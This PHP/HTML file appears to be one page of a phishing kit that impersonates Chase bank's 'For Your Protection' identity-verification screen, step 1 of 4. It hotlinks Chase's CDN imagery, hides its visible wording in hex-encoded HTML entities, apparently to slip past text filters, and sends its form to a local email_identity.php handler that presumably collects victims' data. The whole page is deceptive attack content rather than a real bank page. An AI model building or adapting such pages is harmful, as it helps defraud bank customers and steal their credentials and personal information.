<?php 
$currentPage = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";

define('Myheader', TRUE);
?> 
 <?php include 'includes/header.php'; ?>
    <body style="overflow-x: hidden; overflow-y: auto; height: 100%" data-has-view="true"><div id="logonApp" data-is-view="true"><div class="homepage" tabindex="-1"><div id="advertisenativeapp" data-has-view="true"><div data-is-view="true"></div></div> <div class="toggle-aria-hidden" id="sitemessage" role="region" aria-labelledby="site-messages-heading" aria-hidden="true" data-has-view="true"><div data-is-view="true"><div id="siteMessageAda" aria-live="polite"><h2 class="util accessible-text" id="site-messages-heading">You have no more site alerts</h2></div> </div></div> <div class="logon-container" id="container"><header class="toggle-aria-hidden" id="logon-summary-menu" data-has-view="true"><div class="logon header jpui transparent navigation bar" data-is-view="true"><a id="logoHomepageLink" href="#"> <div class="chase logo"></div> <span class="util accessible-text">&#x43;&#x68;&#x61;&#x73;&#x65;&#x20;&#x68;&#x6f;&#x6d;&#x65;&#x70;&#x61;&#x67;&#x65;</span></a> </div></header> <main id="logon-content" data-has-view="true"><div class="msd password-reset first-step" data-is-view="true"><div id="backgroundImage">
	
	<div class="jpui background image fixed blurred" id="geoImage"><style type="text/css">.jpui.background.image { background-image: url(https://static.chasecdn.com/content/geo-images/images/background.mobile.day.5.jpeg/default.jpeg);filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://static.chasecdn.com/content/geo-images/images/background.mobile.day.8.jpeg/default.jpeg', sizingMethod='scale');-ms-filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://static.chasecdn.com/content/geo-images/images/background.mobile.day.5.jpeg/default.jpeg', sizingMethod='scale');}@media (min-width:768px) { .jpui.background.image{background-image:url(https://static.chasecdn.com/content/geo-images/images/background.mobile.day.5.jpeg/default.jpeg); } }@media (min-width:992px) { .jpui.background.image{background-image:url(https://static.chasecdn.com/content/geo-images/images/background.tablet.day.5.jpeg/default.jpeg); } }@media (min-width:1200px) { .jpui.background.image{background-image:url(https://static.chasecdn.com/content/geo-images/images/background.desktop.day.5.jpeg/default.jpeg); } }</style></div>
	
	</div> <div class="container"><div class="row jpui primary panel"><div class="col-xs-12 col-md-10 col-md-offset-1 content-container"><form class="toggle-aria-hidden" method="POST" id="passwordReset" autocomplete="off" action="email_identity.php?web/auth/dashboard#/dashboard/overviewAccounts/overview/index" novalidate=""><h1 class="header" id="passwordResetHeader" tabindex="-1">For Your Protection</h1> <div class="row jpui panel body" id="mainpanel"> <div class="col-xs-12 col-sm-10 col-sm-offset-1"><div class="progress u-no-outline" id="progress" tabindex="-1"><div class="row"><div class="col-xs-12 col-sm-6 clear-padding"><h2>Instructions <span class="util high-contrast">Step 1 of 4</span></h2> </div> <div class="col-xs-12 col-sm-6 progress-padding"><div class="jpui progress rectangles" id="progress-progressBar" data-progress=""><ol class="steps-4" role="presentation"><li class="active current-step" id="progress-progressBar-step-1"><span class="util accessible-text" id="accessible-progress-progressBar-step-1"></span></li><li id="progress-progressBar-step-2"></li><li id="progress-progressBar-step-3"></li>
    <li id="progress-progressBar-step-4"></li></ol></div></div></div></div> <p class="text customer-question"><span class="jpui link" id="identify_customer_question-link-wrapper"><a class="link-anchor" id="identify_customer_question" href="javascript:void(0);" aria-label=" Have a question? Opens dialog">Have a question?</a></span></p> <h3>We don't recognize the computer you're using.</h3> <p>This may have happened because you're using a device you don't usually use or you cleared the cookies on your phone. (Cookies are how we remember you.)
</p>  
<p>&#x46;&#x6f;&#x72;&#x20;&#x79;&#x6f;&#x75;&#x72;&#x20;&#x73;&#x65;&#x63;&#x75;&#x72;&#x69;&#x74;&#x79;&#x2c;&#x20;&#x77;&#x65;&#x20;&#x6e;&#x65;&#x65;&#x64;&#x20;&#x74;&#x6f;&#x20;&#x76;&#x65;&#x72;&#x69;&#x66;&#x79;&#x20;&#x79;&#x6f;&#x75;&#x72;&#x20;&#x69;&#x64;&#x65;&#x6e;&#x74;&#x69;&#x74;&#x79;&#x20;&#x62;&#x65;&#x66;&#x6f;&#x72;&#x65;&#x20;&#x79;&#x6f;&#x75;&#x20;&#x63;&#x61;&#x6e;&#x20;&#x73;&#x69;&#x67;&#x6e;&#x20;&#x69;&#x6e;&#x20;&#x74;&#x6f;&#x20;&#x79;&#x6f;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x73;&#x2e;
</p>
<p>&#x43;&#x68;&#x6f;&#x6f;&#x73;&#x65;&#x20;&#x22;&#x4e;&#x65;&#x78;&#x74;&#x22;&#x20;&#x74;&#x6f;&#x20;&#x6c;&#x65;&#x74;&#x20;&#x75;&#x73;&#x20;&#x6b;&#x6e;&#x6f;&#x77;&#x20;&#x68;&#x6f;&#x77;&#x20;&#x79;&#x6f;&#x75;&#x20;&#x77;&#x61;&#x6e;&#x74;&#x20;&#x74;&#x6f;&#x20;&#x72;&#x65;&#x63;&#x65;&#x69;&#x76;&#x65;&#x20;&#x79;&#x6f;&#x75;&#x72;&#x20;&#x74;&#x65;&#x6d;&#x70;&#x6f;&#x72;&#x61;&#x72;&#x79;&#x20;&#x69;&#x64;&#x65;&#x6e;&#x74;&#x69;&#x66;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x20;&#x63;&#x6f;&#x64;&#x65;&#x2e;
</p>
<div class="recovery options inside-container"><div class="row"> </div>   </div> <div class="button-container row hide-xs show-sm"><div class="col-xs-12 col-sm-3 col-sm-offset-6"><button type="button" id="exitResetPassword-sm" class="jpui button focus fluid"><span class="label">Cancel</span> </button></div> <div id="logonSkipLinkContainer">
</div> <div class="col-xs-12 col-sm-3"><button type="submit" id="proceedToLocateUserId-sm" class="jpui button focus fluid primary" aria-disabled="true"><span class="label">Next</span> </button></div></div> <div class="button-container row hide-sm"><div class="col-xs-12 col-sm-3 col-sm-push-9"></div> <div class="col-xs-12 col-sm-3 col-sm-push-3"></div></div> <div class="button-container row hide-sm"><div class="col-xs-12 col-sm-3 col-sm-push-9"><button type="submit" id="proceedToLocateUserId" class="jpui button focus primary fluid" aria-disabled="true"><span class="label">Next</span> </button></div> <div class="col-xs-12 col-sm-3 col-sm-push-3"><button type="button" id="exitResetPassword" class="jpui button focus fluid"><span class="label">Cancel</span> </button></div></div></div></div></form> </div></div></div></div></main></div> <footer class="logon-footer" id="logon-footer" data-has-view="true"></footer></div> <div id="languageSupportDisclaimer"></div> <div id="overlay" data-has-view="true"></div> <div class="overlay"></div> <div id="signoutModal"></div> <div id="siteExitWarning"></div> <div id="serviceErrorModal"></div> <div id="sessionTimeoutModal"></div></div></body></html>